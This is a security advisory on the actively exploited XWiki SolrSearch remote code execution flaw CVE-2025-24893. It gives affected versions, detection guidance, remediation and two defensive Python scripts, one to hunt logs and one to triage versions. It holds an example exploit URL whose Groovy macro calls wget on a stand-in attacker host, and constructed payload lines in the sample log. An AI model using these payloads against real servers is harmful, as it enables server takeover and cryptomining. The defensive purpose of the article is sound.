CISA KEV Alert: XWiki RCE Flaw Actively Exploited for Cryptomining

CISA Adds Critical Unauthenticated RCE in XWiki (CVE-2025-24893) to KEV Catalog Amid Active Exploitation

CRITICAL
October 31, 2025
Topics: Vulnerability, Patch Management, Cyberattack


Executive Summary

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in the XWiki enterprise wiki platform, tracked as CVE-2025-24893, to its Known Exploited Vulnerabilities (KEV) catalog following confirmation of active, in-the-wild exploitation. The flaw is an unauthenticated remote code execution (RCE) vulnerability with a CVSS score of 9.8 that gives an attacker complete control of a vulnerable server. Observed attacks use this access to deploy cryptocurrency mining malware. Under Binding Operational Directive 22-01, Federal Civilian Executive Branch (FCEB) agencies must remediate KEV entries by the due date CISA sets; all organizations running affected XWiki versions should patch immediately.


Vulnerability Details

The vulnerability, CVE-2025-24893, is an eval injection flaw (CWE-95) in the way the SolrSearch macro in XWiki handles search queries. The search text supplied by the requester is reflected into content that XWiki renders, and because the macro does not neutralize wiki macro syntax in that text, a query containing a {{groovy}} block is interpreted and executed rather than searched for. No authentication is required: an attacker triggers it with a single crafted GET request. The Groovy code runs inside the XWiki Java process, with the operating-system privileges of the account running the servlet container (typically Tomcat or Jetty), which is what makes full server compromise possible.

An illustrative request of this kind (an example, not an observed payload, shown partly URL-decoded for readability) might look like this:

/xwiki/bin/view/Main/SolrSearch?q=~"{{groovy}}new%20ProcessBuilder(\"wget\",\"http://attacker.com/payload.sh\").start(){{/groovy}}"~&sort=score&sort_order=desc

The simplicity of the request and the absence of any authentication requirement make every internet-facing, unpatched XWiki instance an easy target; an attacker needs nothing beyond the wiki's URL.

Affected Systems

The vulnerability affects the following versions of the XWiki Platform:

  • 15.x and earlier: all versions prior to 15.10.11
  • 16.x: versions prior to 16.4.1
  • The fix is also present in 16.5.0RC1 and every later release

Exploitation Status

CVE-2025-24893 is being actively exploited in the wild. Researchers at VulnCheck reported multiple exploitation attempts against their XWiki honeypots, traced to an IP address geolocated in Vietnam. The observed chain uses the RCE to run a wget command that downloads a second-stage script, which in turn fetches and executes a cryptocurrency mining payload. CISA added the CVE to the KEV catalog on October 30, 2025; KEV inclusion is CISA's confirmation of active exploitation and starts the remediation clock for FCEB agencies under Binding Operational Directive 22-01.

Impact Assessment

Successful exploitation of CVE-2025-24893 results in unauthenticated remote code execution, giving an attacker complete control over the underlying server. While current attacks focus on cryptomining (T1496 - Resource Hijacking), the level of access gained could easily be used for more destructive purposes, including:

  • Data theft of sensitive information stored in the wiki.
  • Lateral movement into the broader corporate network.
  • Deployment of ransomware or other malware.
  • Using the compromised server as a pivot point for further attacks.

Cyber Observables for Detection

Security teams can hunt for exploitation attempts by searching for suspicious patterns in web server access logs.

  • Log Pattern: Look for GET requests whose path contains /Main/SolrSearch (XWiki serves this page under both /bin/view/ and /bin/get/) and whose query parameters (the search text, whether passed as q, text or another name) contain {{groovy}}, {{async}}, a }}} verbatim-closing sequence, ProcessBuilder, Runtime.getRuntime(), .execute(), or other Groovy syntax. URL-decode the query string before matching, and decode it twice to catch double encoding: the payload arrives percent-encoded (%7B%7Bgroovy%7D%7D), so a literal match on the raw request line will miss it.
  • Process Monitoring: On XWiki servers, alert on child processes of the Java process that runs XWiki (the servlet container), in particular shells and downloaders such as sh, bash, wget and curl, and any binary executed from /tmp, /var/tmp or /dev/shm, the usual staging locations for downloaded miner payloads.
  • Network Monitoring: Watch for outbound connections from XWiki servers to unknown or suspicious IP addresses, which could indicate payload download or C2 communication, and for the sustained CPU load and long-lived outbound connections to mining-pool infrastructure that follow a successful miner deployment.
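
To make the log-pattern hunt above concrete, here is an added Python example (not code from the article, XWiki, VulnCheck or CISA) that parses combined-format access log lines, URL-decodes the query string twice and flags SolrSearch requests carrying XWiki macro or Groovy execution indicators. It deliberately casts a wider net than the article's single example: it inspects every query parameter, not only q, and accepts the /bin/get/ action alongside /bin/view/, since XWiki renders the same page through both. The five log lines embedded in the block are constructed, with RFC 5737 documentation addresses standing in for real clients and payload hosts.

```python
"""Hunt for CVE-2025-24893 exploitation attempts in web server access logs.

Added example for this article; not code from XWiki or from the article's
sources. It parses combined-format (Apache/Nginx) access log lines,
URL-decodes the query string (payloads arrive percent-encoded, so matching
the raw request line misses them) and flags requests to the SolrSearch
page whose parameters contain XWiki macro syntax or Groovy execution
primitives. The log lines at the bottom are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, unquote_plus, urlsplit

# client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The SolrSearch page is reachable through both the view and get actions,
# so the path filter is wider than the article's /bin/view/ example.
SOLR_PATH_RE = re.compile(r'/bin/(?:view|get)/Main/SolrSearch\b', re.IGNORECASE)

# Indicators checked against the decoded query string, in this order.
PAYLOAD_PATTERNS = [
    ("wiki_macro_groovy", re.compile(r'\{\{\s*groovy\b', re.IGNORECASE)),
    ("wiki_macro_async", re.compile(r'\{\{\s*async\b', re.IGNORECASE)),
    ("verbatim_breakout", re.compile(r'\}\}\}')),  # closes a {{{verbatim}}} block
    ("process_builder", re.compile(r'ProcessBuilder')),
    ("groovy_execute", re.compile(r'\.execute\(\)')),
    ("runtime_exec", re.compile(r'Runtime\.getRuntime\(\)')),
    ("downloader", re.compile(r'\b(?:wget|curl)\b', re.IGNORECASE)),
]


def decode_query(target):
    """Return 'name=value&...' with every value URL-decoded twice.

    parse_qs performs one round of decoding; the second unquote_plus catches
    double-encoded payloads (%257B%257B -> %7B%7B -> {{).
    """
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return "&".join(
        f"{name}={unquote_plus(value)}"
        for name, values in params.items()
        for value in values
    )


def analyze_line(line):
    """Return a finding dict for a suspicious SolrSearch request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    if not SOLR_PATH_RE.search(unquote(target)):
        return None
    decoded = decode_query(target)
    hits = [name for name, rx in PAYLOAD_PATTERNS if rx.search(decoded)]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "indicators": hits,
        "decoded_query": decoded,
    }


def hunt(lines):
    """Run analyze_line over an iterable of log lines and keep the findings."""
    return [f for f in map(analyze_line, lines) if f]


# Constructed sample log (RFC 5737 documentation addresses). Line 1 is a
# normal search; lines 2 and 3 carry Groovy macro payloads of the kind the
# article describes; line 4 hits a different page; line 5 is double-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Oct/2025:10:01:02 +0000] "GET /xwiki/bin/view/Main/SolrSearch?text=quarterly+report&sort=score HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [28/Oct/2025:10:03:17 +0000] "GET /xwiki/bin/view/Main/SolrSearch?q=~%22%7B%7Bgroovy%7D%7Dnew%20ProcessBuilder(%22wget%22,%22http://198.51.100.7/payload.sh%22).start()%7B%7B/groovy%7D%7D%22~&sort=score&sort_order=desc HTTP/1.1" 200 812 "-" "python-requests/2.31"',
    '198.51.100.23 - - [28/Oct/2025:10:05:44 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22curl%20-s%20http%3A%2F%2F198.51.100.7%2Fx.sh%22.execute()%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 640 "-" "curl/8.5.0"',
    '203.0.113.9 - - [28/Oct/2025:10:07:10 +0000] "GET /xwiki/bin/view/Main/WebHome?search=groovy HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.42 - - [28/Oct/2025:10:09:31 +0000] "GET /xwiki/bin/view/Main/SolrSearch?q=%257B%257Bgroovy%257D%257DRuntime.getRuntime().exec(%2522id%2522)%257B%257B%252Fgroovy%257D%257D HTTP/1.1" 500 0 "-" "Go-http-client/1.1"',
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["indicators"], finding["decoded_query"])
```

hunt() accepts any iterable of lines, so hunt(open(path)) works on a real file. Triage matches with a 200 status first, since the server returned content for the request, but a 500 does not prove the payload failed; the Groovy may have run before rendering broke.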

Detection Methods

  • Vulnerability Scanning: Use vulnerability scanners with up-to-date plugins to identify unpatched XWiki instances in your environment.
  • Log Analysis: Implement SIEM rules to alert on the log patterns described above. This is an application of D3-NTA: Network Traffic Analysis on web logs.
  • Endpoint Detection and Response (EDR): An EDR agent on the server can detect the anomalous process creation stemming from the XWiki Java process, a key part of D3-PA: Process Analysis.

Remediation Steps

Immediate patching is the most effective remediation.

  1. Upgrade XWiki: Upgrade to a patched version as soon as possible:
    • XWiki 15.10.11 or later
    • XWiki 16.4.1 or later
    • XWiki 16.5.0 or later
  2. Workaround (if patching is not possible): As a temporary measure, edit the xwiki.properties file and set search.solr.rawQuery to false, which disables raw query processing at the cost of some search functionality. Treat this as a stopgap only: confirm the exact setting against the XWiki security advisory for this CVE before relying on it, and schedule the upgrade regardless.
  3. Restrict Access: If possible, restrict access to the XWiki instance to trusted IP ranges or place it behind a VPN. This is a form of D3-NI: Network Isolation.
  4. Web Application Firewall (WAF): Deploy WAF rules that block requests to the SolrSearch page containing wiki macro or Groovy execution patterns ({{groovy}}, ProcessBuilder, Runtime.getRuntime(), .execute()), matched after URL decoding. A WAF buys time but can be bypassed with alternative encodings and macro variants, so it is defense in depth, not a substitute for the patch.
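
Step 1 depends on knowing where each instance sits relative to the fixed releases. The following added Python example (not XWiki project code) parses XWiki version strings, including release-candidate and milestone suffixes such as 16.5.0RC1 or 16.0.0-rc-1, and classifies them against the affected ranges exactly as this article states them. The inventory at the bottom is constructed; hostnames are placeholders.

```python
"""Classify XWiki Platform version strings against the affected ranges the
article lists for CVE-2025-24893 (fixed in 15.10.11, 16.4.1 and 16.5.0RC1).

Added example for this article, not XWiki project code. XWiki version
strings take forms such as 15.10.10, 16.4.1, 16.5.0RC1 or 16.0.0-rc-1;
a release candidate or milestone sorts before the final release with the
same numbers, which a plain string comparison gets wrong. The ranges are
taken from the article as stated: every release before 15.10.11, and
every 16.x release before 16.4.1.
"""
import re

FIXED_15 = (15, 10, 11)
FIXED_16 = (16, 4, 1)
FINAL = 2  # pre-release rank: milestone 0 < rc 1 < final 2

VERSION_RE = re.compile(
    r'^(\d+)(?:\.(\d+))?(?:\.(\d+))?'          # major[.minor[.patch]]
    r'(?:[-.]?(rc|milestone|m)[-.]?(\d+))?$',  # optional RC1 / -rc-1 / -milestone-2
    re.IGNORECASE,
)


def parse_version(text):
    """Return (major, minor, patch, rank, pre_no) so tuples compare correctly."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised XWiki version: {text!r}")
    major, minor, patch, kind, pre_no = m.groups()
    numbers = tuple(int(part or 0) for part in (major, minor, patch))
    if kind is None:
        return numbers + (FINAL, 0)
    rank = 0 if kind.lower() in ("milestone", "m") else 1
    return numbers + (rank, int(pre_no))


def is_vulnerable(version):
    """True when the version falls inside the article's affected ranges."""
    v = parse_version(version)
    if v[0] < 16:
        return v < FIXED_15 + (FINAL, 0)  # "versions prior to 15.10.11"
    if v[0] == 16:
        return v < FIXED_16 + (FINAL, 0)  # "versions prior to 16.4.1"; 16.5.0RC1+ carry the fix
    return False  # 17.x and later were cut after the fix


def triage(inventory):
    """Map hostname -> (version, 'VULNERABLE' | 'patched') for a version inventory."""
    return {
        host: (ver, "VULNERABLE" if is_vulnerable(ver) else "patched")
        for host, ver in inventory.items()
    }


# Constructed inventory; hostnames are placeholders.
INVENTORY = {
    "wiki-prod-01": "15.10.10",
    "wiki-prod-02": "15.10.11",
    "wiki-stage": "16.4.0",
    "wiki-dev": "16.5.0RC1",
    "wiki-legacy": "16.0.0-rc-1",
    "wiki-new": "17.3.0",
}

if __name__ == "__main__":
    for host, (ver, state) in triage(INVENTORY).items():
        print(f"{host:14} {ver:12} {state}")
```

Feed it the version shown in the wiki footer or the administration UI. The parser ranks milestones below release candidates below final releases because a text comparison misorders pre-releases ("16.5.0RC1" sorts after "16.5.0" as a string), which would mark a vulnerable RC as patched.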

Timeline of Events

  1. February 1, 2025: The XWiki RCE vulnerability (CVE-2025-24893) was first disclosed.
  2. October 28, 2025: VulnCheck reports observing active in-the-wild exploitation of CVE-2025-24893.
  3. October 30, 2025: CISA adds CVE-2025-24893 to its Known Exploited Vulnerabilities (KEV) catalog.
  4. October 31, 2025: This article was published.

MITRE ATT&CK Mitigations

M1051 Update Software: The primary mitigation is to update the XWiki platform to a patched version (15.10.11, 16.4.1, 16.5.0RC1 or later) that corrects the eval injection flaw.

M1050 Exploit Protection: Use a Web Application Firewall (WAF) to inspect incoming traffic and block requests containing Groovy macro and code-execution patterns.

M1042 Disable or Remove Feature or Program: As a temporary workaround, disable the raw query feature in the XWiki configuration so the vulnerable code path cannot be reached.

M1030 Network Segmentation: Restrict network access to the XWiki instance so it is not unnecessarily exposed to the public internet.

Sources & References

Known Exploited Vulnerabilities Catalog
CISA (cisa.gov) October 30, 2025
XWiki Vulnerability Exploited in Cryptocurrency Mining Operation
SecurityWeek (securityweek.com) October 30, 2025
XWiki CVE-2025-24893 Exploited in the Wild
VulnCheck (vulncheck.com) October 28, 2025
Cryptomining operation underpinned by critical XWiki exploit
SC Media (scmagazine.com) October 30, 2025

Article Author

Jason Gomes


• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.


Tags

CVE-2025-24893, XWiki, RCE, CISA, KEV, vulnerability, cryptomining
